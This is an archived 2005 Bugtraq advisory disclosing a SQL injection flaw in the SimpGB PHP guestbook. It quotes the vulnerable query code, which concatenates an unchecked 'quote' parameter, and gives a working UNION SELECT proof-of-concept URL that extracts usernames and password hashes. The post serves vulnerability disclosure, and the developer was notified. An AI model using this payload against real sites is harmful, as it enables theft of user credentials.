SimpGB SQL Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SimpGB SQL Injection Vulnerability
From: Alexander Müller <visus@xxxxxxxxxxxxxxx>
Date: Sun, 13 Mar 2005 17:23:11 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040421

Hi,

The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can beexploited to gainuserdata. The quote variable isn't checked carefully insimpgb/include/gb_new.inc called

by guestbook.php.

I wrote a proof of concept which shows a md5 hash and the username, readfrom the database.


simpgb/include/gb_new.inc:

50: if(isset($quote) && ($quote))
51: {
52:     $sql = "select * from ".$tableprefix."_data where entrynr=$quote";
53:     if(!$result = mysql_query($sql, $db))
54:         die("Unable to connect to database.".mysql_error());

PoC:

http://[whereever the guestbook is]/simpgb/guestbook.php?lang=de&mode=new
&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201

The developer has been informed.

[1] http://www.boesch-it.de/sw/php-scripts/simpgb/english/download.php
[2] http://www.boesch-it.de

Greets to neonomicus who helped me getting the database structure of SimpGB.

visus

Prev by Date: [XSS] paBox 2.0
Next by Date: Master RPC program number data base (/etc/rpc)
Previous by thread: [XSS] paBox 2.0
Next by thread: Master RPC program number data base (/etc/rpc)
Index(es):
- Date
- Thread